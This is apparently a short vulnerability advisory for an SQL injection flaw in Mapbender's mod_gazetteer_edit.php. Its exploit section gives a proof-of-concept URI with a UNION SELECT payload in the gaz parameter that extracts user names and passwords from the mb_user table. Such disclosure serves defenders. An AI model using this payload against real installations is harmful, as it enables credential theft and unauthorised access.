Mapbender 'mod_gazetteer_edit.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Mapbender 'mod_gazetteer_edit.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/php/mod_gazetteer_edit.php?gaz= 1 LIMIT 0 UNION(SELECT char(65), char(65), char(65), char(65), char(65), char(65),mb_user_name, char(65), mb_user_password, char(65) from mb_userLIMIT 0,1)